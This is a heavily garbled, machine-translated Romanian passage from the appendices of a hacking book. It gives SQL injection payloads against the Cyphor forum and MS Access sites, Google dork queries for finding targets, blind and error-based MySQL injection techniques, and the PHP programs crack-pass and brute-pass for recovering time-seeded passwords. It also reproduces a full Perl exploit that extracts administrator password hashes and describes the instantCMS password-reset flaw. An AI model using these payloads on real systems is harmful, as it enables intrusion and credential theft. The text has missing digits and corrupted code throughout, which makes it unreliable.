de enumerare locală a parolelor digitale cu numărul maxim de conexiuni ( ) a fost de - de încercări pe secundă Toate parolele posibile cu o lungime de una până la trei cifre au fost sortate în - secunde și de la una până la patru cifre - în minute Desigur, dacă aveți acces fizic la computer, opțiunea de utilizare a VMware Authentication Daemon este departe de a fi cea mai bună - este mult mai ușor și mai rapid să aruncați fișierul cu parole și să spargeți hash-urile acestora Deci, a fost o vulnerabilitate Windows cu VMware instalat Și acum despre vulnerabilitățile cunoscute ale programului VMware în sine (vulnerabilitatea demonului de autentificare și altele) Consultați http://www cvedetails com/cve/CVE- - pentru o altă vulnerabilitate VMware Authentication Daemon (în engleză) Esența sa este că VMware Authentication Daemon al serviciului de autorizare VMware în VMware Workstation, VMware РІауer și produsele VMware Server x până la anumite versiuni de asamblare permite unui atacator de la distanță să provoace o refuz de serviciu (crash proces) prin introducerea \ secvența x \x în comenzile USER și PASS De asemenea, o vulnerabilitate similară este descrisă într-o notă anterioară Sarcini reale ale GG-security CVE- - , dar cu o secvență de caractere diferită După cum putem vedea din numerele CVE, ambele vulnerabilități datează din și au fost deja remediate în versiunea de VMware Pyayer pe care am instalat-o Din informațiile conținute în paragraful anterior, putem concluziona că, întrucât VMware Authentication Daemon este utilizat nu numai în VMware Pavier, ci și în VMware Workstation, precum și în VMware Server, atunci sistemele în care se află oricare din această familie de programe instalate , sunt, de asemenea, susceptibile la ghicirea parolei de la distanță După cum am aflat după ce am găsit lacuna descrisă, după ce am căutat potențiale vulnerabilități pe computerul meu, Kaspersky Internet Security antivirus a menționat, printre alte programe, VMware Pavier ca un program nesigur, deși nu necesita o remediere obligatorie După ce faceți clic pe butonul Detalii, în browser se deschide o pagină cu următoarea adresă: http://www securelist com/ru/advisories/ /?function«advisories&VN= Acolo, în rusă, sunt enumerate cele mai recente vulnerabilități ale produselor VMware, este oferită o scurtă descriere a acestora și există link-uri către paginile corespunzătoare cu CVE (în engleză) Aparent, aceste vulnerabilități nu reprezintă un mare pericol Mai mult, sunt disponibile actualizări software de la VMware, în care aceste vulnerabilități au fost eliminate Comenzi de bază *pix Îmi dau seama că lista de comenzi *pix din această anexă este foarte scurtă și nu acoperă nici măcar o mică parte din toate comenzile pe care hackerii le place să le folosească Totuși, acesta este minimul necesar, dar nu suficient Pentru cunoștințe suplimentare, consultați referințele pentru comenzile de buzunar Linux sau resursele online aferente Оs Lista tuturor fișierelor dintr-un director dl g De asemenea Lista tuturor fișierelor dintr-un director pwd Numele directorului curent cd Schimbați în directorul specificat pisica Vizualizați conținutul fișierului specificat d ID-ul și numele utilizatorului curent d ID-ul utilizatorului specificat whoaml "Cine sunt?" - numele utilizatorului curent uname -a Informații despre mașină și sistemul de operare uptlme Timpul de funcționare continuă a sistemului (fără repornire) netstat Conexiuni de retea Anexa Comenzi de bază *pix-comenzi om Ghid de referință pentru *pix-commands man ascii Tabelul codurilor de caractere ASCII -help Informații scurte despre echipă utilizatorii Lista utilizatorilor activi în prezent, care La fel, dar într-un format diferit w La fel, dar într-un format diferit ps Lista proceselor curente ale utilizatorului ps-Al Lista tuturor proceselor klll Încheierea procesului sub numărul flnger Informații despre utilizator ast Informații despre conectări recente ultimul Informații despre ultimele autentificări ale utilizatorului cf Copiere fișier mv Mutarea sau redenumirea unui fișier rm Ștergerea unui fișier mkdlr Creați un director rmdlr Ștergerea unui director chmod xxx Schimbați permisiunile pentru un fișier sau director vi Editarea unui fișier în editorul vi Comenzi de bază *pix-comenzi vi m De asemenea scrie Editarea unui fișier cu editorul kwrite (cu GUI) ss -o Compilarea unui program C gcc -o Compilarea unui program C cu compilatorul GNU wget - Descărcarea unui fișier de pe Internet pe computerul local curl -o De asemenea Injecții SQL în modulul show php al forumului Cyphor În această anexă, ne vom uita la două injecții SQL în modulul show php Acest modul afișează conținutul postărilor de pe forum și este disponibil fără a vă conecta la Cyphor Am adus aceste vulnerabilități în aplicație, pentru că dintr-un motiv necunoscut, modulul show php nu a funcționat pentru mine la început, apoi a funcționat, iar apoi, după ce am închis fereastra browserului și am redeschis-o, a încetat să funcționeze din nou Așa că aduc acest material mai degrabă spre revizuire Mai întâi trebuie să adăugați cel puțin un forum Pentru a face acest lucru fără a vă conecta în sistem, să edităm fișierul cyphor/admin/forum-create php așa cum se arată în fig P , punând la începutul liniei cu funcția includeC'check php”) simbolul de comentariu — # Din acest motiv, verificarea înregistrării utilizatorului în sistem va fi dezactivată Nu uitați să salvați fișierul modificat tii" /include/db nysql php"): iii> i iub (și /include/settings php"); im lnifc(" /inelude/global php"): imluHc("adain php"): b php ">; Orez P Schimbarea fișierului cyphor/admin/forum-create php Acum accesați http://localhost/webexploitation package /cyphor/admin/forum-create php în browser Creați un nou forum așa cum se arată în fig P făcând clic o dată pe butonul Creare forum Să aplicăm injecția SQL a parametrului id Șirul de interogare arată astfel (Fig A ): http:// osa host/webexploi tati on package /cyphor/show php? fi d=l&id=- union select , , , , nick,password, ,id, from cyphor users unde id=l Aici, din tabelul cyphor users, parametrii id, pseudonimul și parola utilizatorului al cărui id=l (administrator) sunt preluați Injecții SQL în modulul show php al forumului Cyphor Orez P Crearea unui nou forum în Cyphor Orez P Injectarea SQL în parametrul id din modulul show php al forumului Cyphor O altă întrebare importantă: cum determină hackerii numele tabelelor și coloanelor? MySQL are o bază de date Information^schema cu tabele și tabele coloane În cazul nostru, putem afla numele tuturor tabelelor cu următoarea interogare: union select l, , , , , ,group concat(table name), , , din information schema tables Anexa Injectare SQL în modulul show php al forumului Cyphor Să luăm în considerare o altă injecție SQL interesantă în parametrul fid al aceluiași modul show php Am găsit această vulnerabilitate în timp ce lucram la textul cărții (cele două injecții anterioare au fost descrise pe site-uri de hackeri și site-uri dedicate problemelor de securitate) După cum am aflat experimental, pentru ca injecția să aibă succes, parametrul fid trebuie să ia o valoare inexistentă (de exemplu, f d=-l), iar parametrul d trebuie să fie absent Când am selectat numărul de coloane, interogarea cu patru parametri în cele din urmă nu a dat un mesaj despre nepotrivirea numărului de coloane: f d=-l union select , din cyphor users Cu toate acestea, această interogare a arătat o altă eroare (Fig A ) Orez P Eroare SQL - acces la tabelul cyphor inexistent După cum puteți vedea, al patrulea parametru este înlocuit în interogare ca nume al tabelului: scriptul face o interogare la tabelul cyphor inexistent O autopsie (adică un studiu al codului sursă al modulului show php) a arătat că aici trebuie folosit numele tabelului real care conține forumul Am creat un singur forum și am denumit tabelul cu el msg test Adică, în loc de al patrulea parametru, ar trebui să înlocuiți constructul „ msg test” (între ghilimele simple, deoarece aceasta este o constantă de text, nu un nume de coloană) Ca urmare, în loc de o eroare, am văzut o pagină de forum A rămas doar să inserăm ceva util în locul celui de-al doilea parametru, de exemplu, apelarea funcției concat: http:// ocalhost/webexploltatlon package /cyphor/show php? f d=- uni on selectați concat(nisk x ,parolă), 'msg test' din cyphor users Rezultatul este prezentat în fig P Injecții SQL în modulul show php al forumului Cyphor Orez P Exploatarea cu succes a injectării SQL în parametrul fid al modulului show php Desigur, exploatarea efectivă a vulnerabilității descoperite este mult mai dificilă, deoarece mai întâi trebuie să aflați numele tabelului care conține forumul Dar, pe de altă parte, am găsit un exemplu interesant de eludare a restricțiilor pz Schimbarea parolelor utilizatorilor forumului Cyphor Parola utilizatorului forumului Cyphor este criptată cu funcția de criptare folosind numele de utilizator (autentificare) convertit în litere mici Cercetarea am arătat că o căutare completă a tuturor parolelor cu lungimea de până la caractere, constând doar din litere mici și cifre, va dura mai mult peste de zile (program de forță brută scris în PHP și care rulează pe sistemul meu sub o mașină virtuală) Dar este posibil să faci ceva pentru a simplifica dacha? Se dovedește că poți În modulul de forum responsabil cu înregistrarea utilizatorilor (register php), este numită funcția de parolă aleatorie (este descrisă în modulul gtobats php) Această funcție generează aleatoriu o parolă de caractere care poate fi citită, constând din litere, cifre și un caracter special, după care trimiteți această parolă; utilizator Pentru a inițializa generatorul de numere aleatoare utilizați; ora curentă a sistemului, așa cum este primită de funcția me() Ca o notă secundară, pe sistemele de operare asemănătoare Unix, ora actuală este reprezentată ca număr de secunde de la ianuarie Dar cel mai interesant este că timpul de înregistrare este stocat în tabelul utilizatorilor cyphor împreună cu alte informații despre utilizator (câmpul se numește data slgnup) Adică, putem „extrage” această (timp) cu o interogare SQL, așa cum se arată în Fig A Orez P Extragem numele de utilizator, hash-ul parolei și timpul de creare (în secunde) din baza de date Schimbarea parolelor utilizatorilor forumului Cyphor Acum ne rămâne să scriem un mic program în PHP, în care funcția de generare a parolei va folosi nu ora curentă, ci cea pe care i-o indicăm (luată din signup dâte) Examinarea modulului register php arată că, pentru orice eventualitate, trebuie să verificați și data înscrierii + (adică plus o secundă) Acest lucru este necesar deoarece ora este scrisă mai întâi la data înscrierii, iar apoi ora sistemului este luată din nou în funcția de parolă aleatorie Adică, o secundă poate avea timp să fie înlocuită cu următoarea (ceea ce este extrem de puțin probabil, dar posibil) Textul complet al programului implicit de recuperare a parolei (l-am numit crack-pass php) este prezentat în fig P # admin:ad ERM YJ j A: elice:al IF HbXChK : $tiraeO - : $porecla utilizator • „alice”: $hash~- „al IF HbXChK “; |paro$cuvânt\t*): exitr): } $umeO • ItimeO * ; } printf("Parola NU a fost găsită pentru utilizator: $user nick \ft"H funcția parolă aleatorie{Ireg^tiwe-{ s rand($reg time); $cons ■ „bcdfghjkl®npqrstvwxz*: $voy ■ „eaiou”; $chl - " *; |spe - $new pas$wd ■ $ubstr(țcons, rand( (strlenț$cons)- )), ) substr($voy rand( (strlen($voy)" )b ) substr($cons, rand( (strlenf$cons)- )), ) substr($voy rând( ,(strlen($yoy)- )) ) substr($spe, rand( (strlen($spe)- )) ) substr($chi, rand( ,($trlen(țchi)- )), ) substrfSchi, rand( ,(strlen($chi)- )j ) substr($cons> rand( ($trlen($cons)- )) ); returnează $new passwd; } L Orez P programul crack-pass php Pentru ca programul crack-pass php să funcționeze, trebuie să specificați în text timpul de creare a utilizatorului, porecla și parola hash Rezultatul programului este prezentat în Fig PZ Z Acum să ne uităm la mecanismul de obținere a accesului la site ca administrator (sau orice alt utilizator existent) Parola implicită de administrator este cyphor (aceasta este specificată în fișierul README txt care vine cu motorul) În viața reală, administratorul schimbă imediat parola Dar îl putem forța să creeze o nouă parolă aleatorie Anexa Schimbarea parolelor utilizatorului Cyphor Forum Orez PZ Z Rezultatul programului crack-pass php prin funcția de recuperare a parolei Pentru a face acest lucru, trebuie doar să-i cunoști cutia poștală, specificată în timpul înregistrării Aceasta nu este o problemă - căsuța poștală este stocată în câmpul de e-mail și este ușor de preluat prin injecție SQL După ce am creat o nouă parolă pentru utilizator în acest fel, o putem găsi cu ușurință prin forță brută Ținând cont de faptul că anumite caractere (consoane și vocale, numere, caractere speciale) se află în locuri strict definite în parola generată, scriem un program de forță brută, așa cum se arată în Fig P (l-am numit brute-pass php) j prinț ("Încercare parola $passwd pentru ($ = ;$ $passv tfd\n"); $delta "tiae() - $ti"eO; printf(" Timp scurs: $delta sec\i"H): iesire(); } } $delta » timei) - $time ; printf("Parola nu a fost găsită pentru utilizator: $user nlck \nTiae scursă: $delta sec\n"); Ieșire(); ?> Orez P programul brute-pass php Procesul complet de enumerare nu durează mai mult de de minute pe sistemul meu Astfel, în maxim trei sferturi de oră avem garanția de a putea intra Schimbarea parolelor utilizatorilor forumului Cyphor Orez P Rezultatul programului brute-pass php pe forum ca administrator Rezultatul programului este prezentat în Fig P Am găsit parola pentru utilizatorul Alice în doar de secunde O altă opțiune (mult mai rapidă) este crearea de forță brută a unei noi parole Notați ora la care a fost solicitată procedura de recuperare a parolei, ajustați pentru ora locală de pe site-ul unde rulează forumul și repeți într-un anumit interval de timp (pentru a lua în considerare inexactitățile în setările de timp de pe mașina dvs și de pe serverul țintă ) De fapt, puteți pur și simplu să luați ora curentă în program și să o micșorați dacă timpul de pe server este mai mic decât cel curent sau să o măriți dacă timpul pe server este mai mare Am simulat o diferență de timp între computerul meu și server la ore, drept urmare, selecția a durat doar secunde După cum a remarcat pe bună dreptate The Matrix după ce a analizat această aplicație: „O solicitare către un server web în răspunsul din antet vă va afișa ora exactă pe server la cea mai apropiată secundă” Odată a investigat o vulnerabilitate similară, dar mult mai dificil de exploatat, în instantCMS Textul articolului său și un link către videoclip sunt oferite, cu amabilitatea sa, în Anexa Așa că puteți alege ceea ce vă place cel mai mult, utilizați metoda mea simplificată sau aflați ora exactă pe server din antetul răspunsului HTTP Nu puteți intercepta răspunsul serverului cu un sniffer și, după schimbarea parolei de administrator, utilizați procedura de recuperare a parolei pentru a vă conecta prin protocolul Telnet (portul ) la gazda vulnerabilă, în cazul nostru astfel: telnet Apoi, trebuie să tastați GET / HTTP / și să apăsați tasta Enter de două ori Serverul web va returna un mesaj de eroare, dar data și ora vor fi afișate pe server Anexa Schimbarea parolelor utilizatorului Cyphor Forum Orez P Obținerea timpului de la răspunsul serverului web în fig P Rețineți că serverul web a returnat și numele și versiunea, precum și versiunea PHP Acestea sunt informații utile pentru un hacker Rămâne doar cu ajutorul unui mic program pentru a converti ora și data în secunde După aceea, în ghicitorul de parole, trebuie doar să micșorați această dată și să verificați parola de fiecare dată până când se obține un rezultat pozitiv Programul de selecție poate fi scris independent pe baza fișierului crack-pass php Dacă aveți puterea și dorința, puteți scrie un exploit complet automatizat în PHP care va extrage porecla, căsuța poștală și hash-ul vechii parole de administrator (în viața reală, poate fi încă util, deoarece este capabil să se apropie contul *pіkh-user, mai ales dacă numele administratorului nu este cel standard - „admin”, ci altul; în acest caz, există o probabilitate mare ca în sistem să existe un utilizator cu o astfel de autentificare; așa cum am notat mai devreme, acest hash ar trebui să fie rupt de programul John The Ripper) Apoi, prin intermediul formularului de recuperare a parolei, exploit-ul va seta o nouă parolă, va extrage hash-ul și îl va restaura conform timpului de creare primit în răspunsul de la server Dar hackerii au găsit o modalitate și mai inteligentă Își înregistrează utilizatorul pe forum, iar apoi prin injecție SQL, folosind instrucțiunea UPDATE, își schimbă ID-ul grupului în „ ” (administrator) Aceasta oferă acces instantaneu la drepturile de administrator Desigur, nimeni nu ar trebui să încerce să testeze acest lucru pe site-urile altora! Autorul nu este responsabil pentru acțiunile tale ilegale Cum poate fi îmbunătățit un program de generare aleatorie de parole, astfel încât acestea să nu poată fi recuperate atât de ușor din momentul în care au fost create? Trebuie să adăugați la timpul de creare un număr care este unic pentru acest sistem De exemplu, puteți calcula hash-ul mdS din rezultatul apelării unor comenzi de sistem precum uname -a, id, pwd, who, ps etc (Forumul Cyphor este conceput numai pentru sisteme *nix), apoi convertiți o parte din hash la un întreg, adăugați-l la ora curentă și utilizați rezultatul pentru a inițializa generatorul de numere aleatoare Atunci atacatorul nu va putea reproduce atât de ușor procesul de creare a unei parole pe mașina sa Deși posibilitatea forței brute rămâne încă pch Utilizarea unui Exploit de injecție SQL în Forumul Cyphor Textul exploit-ului poate fi găsit pe Internet, de exemplu, la http://www securiteam com/unixfocus/ POOFlFEKC htmL Copiați textul exploit-ului de pe pagina web în editor și salvați, de exemplu, în fișierul cyphor pl Pentru ca exploit să funcționeze pe mașina dvs , trebuie să înlocuiți cuvântul utilizatori din șirul atribuit variabilei $url cu cuvântul utilizatori cyphor Textul complet al exploit-ului final este prezentat mai jos Rețineți că linia $ug este înfășurată în carte, ar trebui să fie o linie lungă în editor #!/bin/env perl #// - -# #// Cyphor Forum SQL Injectlon Exploit De HACKERS PAL #// Salutări pentru Devii- - Răpitor - Almaster #// http://WwW S Q R NeT #// - -# utilizați LWP::Simple; nrint "\ ########W W H HH-I I I I I I H H-" • H' L \ II G GYA G tt nil tt TttgtT nit tt ttn tt nit ttn tt P tt tt tl It tt mon p P și tt tt tt p și p P tt tt P il P n It p P tt p P n , prinț "\n# Cyphor Forum Exploit By : HACKERS PAL #": prinț "\n# Http://WwW SoQoR NeT #"; dacă(!$ARGV[O]||!$ARGV[l]) { prinț "\n# Utilizare: #": prinț "\n# perl $ [Full-Path] #": prinț "\n# Exemplu: #": prinț "\n# perl $ http://www cynox ch/cyphor/forum/ #"; continuare & Anexa Utilizarea Exploit-ului SQL Injection prinț "\n# Greets To Devii- - Răpitor - almastar #”; prinţ ieșire( ); } el se { prinț "\n# Greets To Devii- - Răpitor - almastar #"; prinț LpOTOTOTSHOTSHSHSHSHSH//Ш№OTSHSHOTAP''; $web=$ARGV[ ]; $ d=$ARGV[l]; $url = "show php?f d= & d \u d - Ж ip pe ^ sel esSHOІ d, , , , nick parola, d ^ from^ c(yphor users^ where^ d=$ d": $s te="$web/$url"; $pagina = get($s te) || dle "[-] Imposibil de retrileve: $!"; prinț "\n[+] Conectat la: $ARGV[ ]\n": prinț "[+] ID utilizator îs : $ d $pagina =~ m/ (,*?) / && prinț ”\n[+] Nume de utilizator este: $l\n": prinț ”\n[-] Nu se poate regăsi numele de utilizator\n" f(!$ ): $pagina =~ m/ ( *?) / && prinț "[+] Hash al parolei este: $l\n"; prinț ”[-] Nu se poate retrage hash-ul parolei\n" f(!$ ); } prinț "\n\nSalutări de la HACKERS PAL Pentru tine :) XnWwW SoQoR Net Sunteți binevenit\n\n": #f n shed Permiteți-mi să vă explic puțin cum funcționează exploit-ul Mai întâi, se conectează la site și trimite o pagină html de pe acesta, apoi în această pagină între etichetele găsește (și tipărește pe ecran) numele de utilizator, iar între etichetele și se află hash-ul parolei Exploita-ul este lansat din consolă cu comanda perl cyphor pl http://localhost/webexploitatiori package /cyphor/ După cum puteți vedea, primul parametru este calea completă către forum, al doilea este numărul de utilizator (administratorul are numărul ) Rezultatul exploatării este prezentat în Fig P Orez P Exploatați munca pentru injectarea SQL pe forumul Cyphor Cu unele abilități de programare, puteți scrie cu ușurință propriile exploit-uri pentru injectarea SQL în acest sau alte motoare bazate pe acest program II C Implementarea injectării SQL în MS SQL Jet Conținutul acestei aplicații se bazează pe un articol publicat pe unul dintre site-urile hackerilor străini Căutare Google: site: org nuri: asp? d= site: com nuri: aspx?= site: co uk inurl: asp?c d= De asemenea, puteți veni cu ceva propriu Să presupunem că am găsit adresa http://www site com și în cursul cercetării sale am găsit următoarele: http://www site com/en/pressread asp? d= Vedem o pagină afișată în mod normal Adaug un singur caracter ghilimele la adresa URL, astfel: http://www site com/en/pressread asp? d= ' Acum vedem o eroare ca următoarea: Eroare Microsoft OLE DB Provlder pentru ODBC Drlvers „ ” [M crosoft][ DBC Microsoft Access Driver] Eroare de sintaxă În strlng În interogarea expreslon „ d= ” /en/lncludes/conflgdb asp linia Acest mesaj de eroare înseamnă că avem șanse mari de a injecta, așa că încercăm să adăugăm AND+ = la adresa: http://www site com/en/pressread asp? d= +AND+l=l# NOTĂ - - ASP folosește caracterul # pentru a comenta restul interogării, nu caracterele - sau /* Când primiți un mesaj de eroare „Tip nepotrivire Cint”, puteți deduce că parametrul de intrare este verificat pentru un tip de date Dacă continuați, puteți găsi un alt site care acceptă atât introducerea numerică, cât și introducerea de șiruri Acum folosim AND+ =O# addition: http://www site com/en/pressread asp? d= +AND+l= # Implementarea SQL Injection în MS SQL Jet Ca urmare, obținem o pagină incompletă sau următoarea eroare: Eroare ADODB FIeld „ a bcd” Elther BOF sau EOF este adevărat sau înregistrarea curentă a fost ștearsă Operațiunea solicitată necesită o înregistrare curentă /en/pressread asp, rândul Adică, acum trebuie să găsim numărul de coloane, iar pentru aceasta folosim comanda ORDER VU de mai multe ori Puteți începe, de exemplu, cu numărul Să presupunem că, după aceea, apare următoarea eroare: Eroare Microsoft OLE DB Provlder pentru ODBC Drlvers „ ” [Microsoft][ODBC Microsoft Access Driver] Baza de date Microsoft Jet nu recunoaște „ ” ca nume de câmp sau expreslon valid /en/lncludes/conflgdb asp, linia Acest mesaj spune că coloana numărul nu există Apoi, trebuie să micșorați numărul până când puteți obține valoarea corectă În exemplul nostru, acest număr este : http://www s te com/en/pressread asp? d= +AND+l= +UNI N+ALL+SELECT+ , , , , # După selectarea numărului potrivit, apare un alt mesaj de eroare: Eroare Microsoft OLE DB Provlder pentru ODBC Drlvers „ ” [Microsoft][ODBC Microsoft Access Driver] Intrarea de interogare trebuie să conțină cel puțin un tabel sau o interogare /en/lncludes/conflgdb asp, linia Interogarea eșuează deoarece trebuie specificat numele unui tabel existent Adică, trebuie să ghiciți numele tabelului: http://www s te com/en/pressread asp? d= +AND+l= +UNI N+ALL+SELECT+ , , , , DE LA utilizator# Până când vom specifica numele corect al tabelului, vom primi următorul mesaj de eroare: Eroare Microsoft OLE DB Provlder pentru ODBC Drlvers „ e ” [Microsoft][ODBC Microsoft Access Driver] Baza de date Microsoft Jet engleză nu poate găsi tabelul de intrare sau interoga „utilizator” Asigurați-vă că t exlsts și că numele său este scris corect /en/lncludes/conflgdb asp linia Iată posibilele nume de tabel, dintre care unul ar trebui probabil să funcționeze: user, users, admln, logln, news, sysobjects, customers Să presupunem că în exemplul nostru tabelul se numește admln Aceasta înseamnă că, ca răspuns la următoarea solicitare, va apărea și un mesaj de eroare, dar într-unul dintre câmpurile din pagină veți vedea, de exemplu, numărul din solicitarea noastră: http://www s te com/en/pressread asp? d= +AND+l= +UNION+ALL+SELECT+ , , , , , , +din+admln# În acest moment, trebuie să treceți la selectarea numelor de coloane Anexa Implementarea injecțiilor SQL în MS SQL Jet Puteți găsi numele coloanelor utilizând operatorul GROUP BY HAVING la sfârșitul interogării dvs , de exemplu: AVÂND = GROUP BY table-name column-name-from-error-message AVÂND = GROUP BY nume-tabel nume-coloană-din-mesaj-de-eroare, nume-tabel nume-coloană-din-mesaj-eroare- AVÂND = GROUP BY table-name column-name-from-error-message, nume-tabel nume-coloană-din-mesaj-de-eroare , nume-coloană-din-mesaj-eroare (n) AVÂND = etc Textul exploatării nabopoll php îmbunătățit După cum am observat în capitolul , am reușit să accelerez semnificativ exploit-ul folosind metoda de căutare binară Intervalul de căutare este împărțit la jumătate de fiecare dată, astfel încât numărul este ghicit în mai multe comparații Nu cred că al meu este perfect, dar funcționează Iată textul programului: "; în timp ce(!$găsit) { $x = intval(($maxx + $minx)/ ); dacă ($maxx == $minx+l) { dacă ($op == ">") { $x=$maxx; $found=true;$user =chr($x);echo chr($x);break;} dacă (($op == " "; pauză; } } } $j++: } ecou „\n”: ?> Rețineți că unele rânduri care sunt împachetate în carte din cauza lipsei de spațiu (în special, linia care începe cu caracterele $xp =) trebuie introduse în editor într-un rând lung n? Obținerea numelor de tabele și date prin injecție oarbă SQL în MS Access Obținerea numelui tabelului: ȘI (SELECTARE TOP FROM table name) Exemplu: ȘI (SELECTARE TOP DIN utilizatori) Obținerea numelui coloanei: ȘI (SELECTARE TOP coloană name FROM table name) Exemplu: ȘI (SELECTARE TOP cadru DIN utilizatori) Extragerea lungimii unui șir specificat: AND IIF((SELECT TOP LEN(^ ko/ O^) FROM table name = X , ) Exemplu: AND IIF((SELECT TOP LEN(nume) FROM utilizatori) = , ) Extragerea datelor din coloane: AND IIF((SELECTARE TOP W{numele coloanei, X, ) FROM tdblname) = CHR(XM), , ) Exemplu: AND IIF((SELECTARE TOP MID(nume, ) FROM utilizatori ) = CHR( ) ) Resetarea parolei de administrator și ghicirea acesteia în instantCMS Materialul din această aplicație este publicat cu permisiunea The Matrix, care a descoperit prima vulnerabilitate, a descris-o și a creat un exploit pentru ea O descriere a vulnerabilității poate fi găsită la https://forum antichat ru/showpost php?p- &postcount= Un videoclip despre această vulnerabilitate este disponibil la http://ifol der ru/ și http://webfile ru/ Toate versiunile sunt vulnerabile Pentru a exploata vulnerabilitatea, aveți nevoie de adresa de e-mail a unui administrator (afișată implicit în profil) și de mult timp Care este scopul? Adresa /components/registration/frontend php conține următorul cod PHP: $sql = "SELECT * FROM cms users WHERE email = '$etaiG LIMIT ": $rezultat = $inDB->interogare($sql): dacă ($inDB->num rows($rezultat)> ){ $usr = $inDB->fetch assoc($rezultat); $nouaparola = substr(md (microtime()) ); $inDB->query("UPDATE cms users SET parola = '" md ($newpassword) "' WHERE id = " $usr['id']) ; $maiIjnessage = $ LANG['HELLO' $usr['nickname'] „\n\n”; $mail message = $ LANG['HELLO'] ' $usr['nickname'] „\n\n”; $maiIjnessage = $ LANG[ „TEXT-REMINDER” J ” „' $inConf->sitename '" ' „\n\n”; $maiIjnessage = $ LANG[' UR PASS IS MD '] „\n”; $maiIjnessage = $ LANG[' UR PASS IS MD TEXT'] „\n\n”; $maiIjnessage = '########## ' $ LANG['YOUR LOGIN'] ': ' $usr[ 'login'J „\n\n”; $maiIjnessage = 'Shhh ' $ LANG[ 'YOUR-NEW-PASS'] ': ' $newpassword „\n\n”: $maiIjnessage = $ LANG['YOU CAN CHANGE PASS'] "\n"; $maiIjnessage = $ LANG['IN CONFIG PROFILE'] ': cmsUser:: getProfileURL($usr['login']) "XnXn"; $maiIjnessage = $ LANG[ Resetarea parolei de administrator și ghicirea acesteia în instantCMS 'SEMNĂTURĂ'] ', ' $ nConf->s tename '(' GAZDĂ ') ' „\n”; $mail message - date('dmY (H: )'); $ nCore->mailText($email $inConf->sitename ' - ' $ LANG[ „REMINDER PASS”] $mai jnessage); Acest script recuperează parolele utilizatorilor împrăștiați Dar cum o face? Verifică dacă există o adresă de e-mail în baza de date Fără ceremonie, atribuie parolei o valoare egală cu primele șase caractere ale hash-ului din valoarea pe care o generează funcția microt me() Funcția microtime() returnează marcajul de timp actual în microsecunde Această funcție este disponibilă numai pe sistemele de operare care acceptă funcția de sistem gett meofday() Apelat fără parametrul opțional returnează un șir în formatul msec sec, unde sec este numărul de secunde de la Epoca Unix (Epoca Unix, ianuarie , : : GMT) și msec este partea fracțională Acesta generează ceva de genul următor: О ххххххОО [ ] Aici caracterele xxxxx reprezintă fracțiuni de secundă, iar numărul de secunde scurs de la epoca Unix este afișat între paranteze drepte Cum să exploatezi vulnerabilitatea? Trebuie să trimiteți o cerere de recuperare a parolei, să interceptați pachetul și să verificați data în răspunsul la cerere Ar trebui să existe ceva de genul următor: Tiye, mai : : GMT În continuare, vom afla pe aparatul local cât de mult a trecut din , : : GMT Dar vor trebui selectate microsecunde, nu le vom recunoaște în niciun fel Pentru a face acest lucru, creăm o listă cu formularul QxxxxxxQQ (timpul în secunde scurs din epoca Unix până în momentul în care a fost trimisă cererea de recuperare a parolei) De exemplu: , În loc de caractere xxxxx, trebuie să inserați toate combinațiile posibile de numere (există milion) Le transformăm apoi în substr(md ( H SELECT FIND IN SET( 'c','a,b,c ,d,e'); -> Hash-ul mdS standard conține doar caractere din următorul set: „ , , , , , ,a bcdef” Adică, putem afla numărul caracterului după cum urmează: selectează find n set((substr ng((selectează parola de la utilizatori Urnit D , )), ' , , , , , , , , , ,a,bcdef'); De exemplu, pentru caracterul „a”, numărul este Acum să presupunem că site-ul are știri cu identificatori de la la , atunci interogarea noastră va arăta astfel: news php?id=find in set(substring((selectați parola de la utilizatori Urnit , ) ),' , , , , , a,bcdef') În funcție de codul caracterului, vom vedea știri cu un identificator corespunzător caracterului hash al parolei Pentru utilizarea practică a metodei, hackerul trebuie să acționeze după cum urmează: Evidențiați cuvintele cheie de pe pagini cu identificatorii doriti (adică cuvintele care sunt unice pentru aceste pagini) Trimiteți interogări cu funcția find n set() pentru fiecare caracter din baza de date Aflați prin cuvânt cheie pagina cu ce identificator am primit și afișați codul caracterului Numărul estimat de solicitări necesare: + solicitări per hash mdS În loc de funcția find n set(), puteți folosi alte funcții: I NSTR(), LOCATE(), ASCII(), ORD(), iar funcțiile ASCII() și ORD() sunt de preferat, deoarece sunt acceptate nu numai în MySQL Și cu ajutorul operațiilor de adunare și scădere, codurile rezultate pot fi „adapte” oricăror identificatori Avantajele metodei includ: О viteza mare de lucru; Metoda O nu necesită ca site-ul să aibă activată raportarea erorilor Dezavantajele metodei: Pe un site real, identificatorii pot fi distribuiti neuniform, adică scriptul va trebui configurat pentru fiecare site în mod individual; R, în funcție de identificatori, un număr mare de caractere din alfabet necesită un număr mare de pagini unice care nu sunt întotdeauna disponibile, altfel trebuie să trimiteți mai mult de o cerere pe caracter Folosind find in set() + morelrow Folosind constructul find Jn set() + morelrow Dezavantajele metodei descrise mai devreme sunt, în principal, că nu toate site-urile pot obține un număr suficient de pagini diferite în funcție de valoarea unui parametru (de exemplu, un identificator) Metoda prezentată în această secțiune a fost descrisă inițial de hackerul Elekt Esența metodei este de a forța scriptul să afișeze un mesaj de eroare în funcție de interogarea SQL Cea mai des folosită cerere este de forma (sugerată de podkashey): SELECTARE UNION SELECTARE Această interogare returnează o eroare: Subinterogarea returnează mai mult de rând ZaCo oferă o cerere alternativă: "x" regexp concat("x{l, ", if(@@version<> "B}", " }")) /* dacă altfel, șirul expresiei va depăși limita maximă a cuantificatorului */ Pentru toate versiunile de MySQL, cu excepția versiunii , această interogare returnează o eroare: # - S-a primit eroarea „număr(e) de repetiții invalid(e)” de la expresia regulată Hackerii au găsit încă erori care sunt afișate atunci când valoarea regexp este incorectă, în total, în răspunsul de la server, putem obține tipuri de erori, plus o stare când nu există nicio eroare Nu există niciun mesaj de eroare în interogarea SELECT Și iată restul solicitărilor și mesajele de eroare corespunzătoare: select if(l=l,(select union select ) ) # - Subinterogarea returnează mai mult de rând selectați expresie regizată dacă (l=l,"x{l, }", ) # - S-a primit eroarea „număr(e) de repetiții invalid(e)” de la expresia regulată selectați expresie regulată dacă(l=l,"x{l,(", ) # - A apărut eroarea „acolade nu sunt echilibrate” de la expresia regulată selectați expresie regulată dacă(ll,'[[:]]\ ) # - A apărut eroarea „clasa de caractere nevalidă” de la expresia regulată selectați expresie regizată dacă (ll,'[[', ) # - A apărut eroarea „paranteze ([ ]) nu sunt echilibrate” de la expresia regulată selectați expresie regizată dacă(l«l,'(({ }' )) # - S-a primit eroarea „operand operator de repetiție invalid” de la expresia regulată selectați expresie regizată dacă (ll,", ) # - S-a primit eroarea „(sub)expresie goală” din expresia regulată selectați expresie regizată dacă (l=l,'(', ) # - A apărut eroarea „parantezele nu sunt 